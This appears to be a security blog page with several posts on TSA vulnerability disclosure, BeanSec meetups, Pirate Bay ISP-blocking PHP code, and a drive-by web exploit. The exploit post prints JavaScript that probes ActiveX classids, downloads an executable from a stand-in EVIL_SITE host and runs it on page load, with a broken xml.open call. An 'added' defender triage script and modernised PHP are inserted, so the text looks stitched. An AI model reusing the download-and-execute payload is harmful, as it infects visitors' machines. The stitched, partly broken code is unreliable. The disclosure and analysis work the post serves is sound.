More commentary on the TSA Security Theater

Bruce Schneier is a security critic, businessman and all star crypto-expert who has been following the “boarding pass hacker” story. In a recent NYT article he offers the following on disclosure and I think it maps quite nicely to what I’ve been considering for the vulnerability research paper I’ve been helping out on.

“ ‘Why should we help the bad guys?’ The answer, he said, is that the bad guys aren’t helped — because they almost certainly already know a system’s weak points — and that disclosing the weaknesses brings pressure on government agencies and their suppliers to improve security for the good guys.”

This NYT article is a little behind since the issue occurred and blew over a while back. Even I have posts on this and my blog is hampered constantly by an overwhelming workload. I am glad to see that *some* public scrutiny has come around to this case. The MA senator who called down the government on Christopher Soghoian seems woefully absent in the article but I just assume that is what politics are all about. To be fair Ed Markey (D – Mass) did reverse himself.

“Rogues are very keen in their profession, and know already much more than we can teach them.” — A.C. Hobbs

Interesting Web Exploit Technique

Today I found another old example of how web site operators are using browser-based exploits to infect “drive by” browsers. If a user goes to the site I found today using a vulnerable browser, an iframe will deliver an advertisement which contains JavaScript-encoded download instructions for exe’s.

Observe

function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log('Ceating the XMLHTTP object...');
var url = "http://EVIL_SITE/adv/168/win32.exe"; var xml = null;
var bin = e.Item("TEMP")+ "\\" + "metasploit.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) return(0);

Log('');
xml.open("http://EVIL_SITE/adv/GET", url, false)
xml.send(null);
dat = xml.responseBody;

Log('');
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);

Log('.');
s.Run(bin,0);
}

function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log('Loaded ' + t[i]);
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log('');
}
</script>
</head>
<body onload='Exploit()'>
<p></p>
</body>

</html>
<html>
<body>
<script>
document.write(unescape("[LARGE BLOCK OF HEX ENCODED DATA]"))
</script>
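
A defender-side triage of page source like the sample above, as an added example that is not from the original post: it scores the strings the sample relies on and first unwraps document.write(unescape(...)) layers, which otherwise hide those strings from a plain match. The indicator weights, the threshold of 5 and both sample inputs are assumptions constructed for illustration.

```javascript
// Added example (Node.js). Indicator strings come from the sample above;
// weights, threshold and the inputs at the bottom are assumptions.
const INDICATORS = [
  { name: 'scripted-classid', re: /setAttribute\s*\(\s*["']classid["']/i, weight: 2 },
  { name: 'adodb-stream', re: /ADODB\.Stream/i, weight: 2 },
  { name: 'wscript-shell', re: /WScript\.Shell/i, weight: 2 },
  { name: 'save-to-file', re: /\.SaveToFile\s*\(/i, weight: 2 },
  { name: 'write-unescape', re: /document\.write\s*\(\s*unescape\s*\(/i, weight: 2 },
];

// Decode %XX and %uXXXX as legacy unescape() does, without evaluating page code.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Return the source plus each decoded unescape("...") literal, following
// nested layers up to maxDepth so the unwrapping always terminates.
function layers(source, maxDepth) {
  const out = [source];
  let frontier = [source];
  for (let d = 0; d < maxDepth && frontier.length > 0; d++) {
    const next = [];
    for (const text of frontier) {
      for (const m of text.matchAll(/unescape\s*\(\s*(["'])([\s\S]*?)\1\s*\)/gi)) {
        next.push(decodeEscapes(m[2]));
      }
    }
    out.push(...next);
    frontier = next;
  }
  return out;
}

// Score a page: each indicator counts once, wherever in the layers it appears.
function triage(source, maxDepth = 3, threshold = 5) {
  const texts = layers(source, maxDepth);
  const hits = INDICATORS.filter((i) => texts.some((t) => i.re.test(t)));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  return { score, suspicious: score >= threshold, hits: hits.map((i) => i.name) };
}

// Constructed inputs: inert indicator fragments, not a working page.
const fragment = 'var s = "WScript.Shell"; var o = "ADODB.Stream"; o.SaveToFile(bin, 2);';
const encoded = fragment.replace(/[^a-z0-9]/gi,
  (c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0'));
const SAMPLE_WRAPPED = `<script>document.write(unescape("${encoded}"))</script>`;
const SAMPLE_BENIGN = '<script>document.write(unescape("%48%69"))</script>';
console.log(triage(SAMPLE_WRAPPED), triage(SAMPLE_WRAPPED, 0), triage(SAMPLE_BENIGN));
```

Calling triage with maxDepth 0 on the wrapped sample shows what a scanner that skips the decoding step would miss.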

BeanSec! December 20th 6-9pm…

We’ve now established a regular schedule for the BeanSec! events; the third Wednesday of each month. So you can mark your calendars now for December 20th at 567 Massachusetts Ave. Upstairs at the Enormous Room from 6-9pm.

For the uninitiated:

BeanSec! is an informal meetup of information security professionals and academics in the Cambridge/Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

The location is the Enormous Room in Cambridge.

pirate bay strikes back

I found this to be a unique form of protest by Swedish site The Pirate Bay. They are opposing the tactic of a Swedish ISP who has decided to block its customers from accessing allmymp3.com. I won’t go into a long diatribe about the merits of imposing restrictions on your customers. I will however share the code that The Pirate Bay has provided to help sites block anyone coming from Perspektiv Bredband.

This is a unique form of protest in that if enough sites fought back with this methodology (essentially a kill file) then customers of the service would eventually leave and force the ISP to reconsider its stance. It’s simply a brilliant methodology.

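// Redirect any visitor whose address falls inside one of the listed ranges.
if (get_perspektiv_ban(getenv("REMOTE_ADDR"))) { Header("Location: http://piratbyran.org/perspektiv/blockad..."); exit; }

// Returns 1 if $iip is inside one of the listed CIDR ranges, 0 otherwise.
function get_perspektiv_ban($iip) {
    // The bit-string comparison below only handles dotted-quad IPv4 input.
    if (filter_var($iip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return 0;
    }

    // Turn the address into a 32-character string of 0s and 1s.
    $a=explode(".", $iip);
    $ip=str_pad(decbin($a[0]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[1]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[2]), 8, "0", STR_PAD_LEFT).str_pad(decbin($a[3]), 8, "0", STR_PAD_LEFT);

    $match=array();
    $match[]="193.108.42.0/23";
    $match[]="85.235.16.0/21";
    $match[]="213.185.16.0/20";
    $match[]="81.88.0.0/20";
    $match[]="195.60.68.0/23";
    $match[]="85.235.0.0/20";
    $match[]="217.72.48.0/20";
    $match[]="85.235.16.0/20";
    $match[]="81.186.240.0/20";
    $match[]="213.185.0.0/19";
    $match[]="89.236.0.0/18";

    // foreach replaces the original each() loop; each() was removed in PHP 8.
    foreach ($match as $value) {
        $c=explode("/", $value);
        $b=explode(".", $c[0]);
        $net=str_pad(decbin($b[0]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[1]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[2]), 8, "0", STR_PAD_LEFT).str_pad(decbin($b[3]), 8, "0", STR_PAD_LEFT);

        // The address is in the range when the first $c[1] bits (the prefix length) are equal.
        if (!strncmp($ip, $net, (int)$c[1])) {
            return 1;
        }
    }
    return 0;
}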

digg mirror of the story

Beansec now on a regular schedule

Andy J had a really good point. Beansec was just too unpredictable to make plans for and our erratic releases of information were just a little *too* spontaneous. So to appease him and the good folks at Matasano The Chris’ and I have decided that all future Beansec events will occur on the Third Wednesday of the Month.

That’s right, every third Wednesday. So you can mark your calendars now for December 20th at 567 Massachusetts Ave Upstairs at the Enormous Room from 6-9pm.